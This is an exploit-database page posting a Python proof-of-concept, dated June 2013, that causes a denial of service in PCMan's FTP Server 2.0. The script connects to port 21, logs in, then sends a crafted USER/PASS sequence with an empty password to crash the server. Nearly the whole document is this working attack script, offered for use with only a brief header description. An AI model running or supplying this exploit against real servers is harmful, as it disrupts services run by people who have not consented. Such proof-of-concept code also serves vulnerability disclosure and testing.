Home / exploits PCMan's FTP Server 2.0 Denial Of Service
Posted on 27 June 2013
#!/usr/bin/python # # #################################################################### # # Exploit Title: PCMan's FTP Server 2.0 Empty Password Denial of Service # Date: 2013/6/26 # Exploit Author: Chako # Vendor Homepage: http://pcman.openfoundry.org/ # Software Download Link: https://files.secureserver.net/1sMltFOsytirTG # Version: 2.0 # Tested on: Windows 7 SP1 English # #Description: # A vulnerability has been identified in PCMan's FTP Server 2.0, # which allows attackers cause a Denial of Service using a # specially crafted request(empty Password). # #################################################################### import socket import sys USER="chako" PASSWD="chako" print(" [+] PCMan's FTP Server 2.0 Empty Password Denial of Service") print("[+] Version: V2.0") print("[+] Chako ") s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("127.0.0.1",21)) data = s.recv(1024) print("[-] Login to FTP Server... ") s.send("USER " + USER + ' ') data = s.recv(1024) s.send("PASS " + PASSWD + ' ') data = s.recv(1024) print("[-] Sending exploit... ") s.send("USER TEST '") s.send("PASS '") s.close() print("[!] Done! Exploit successfully sent ")
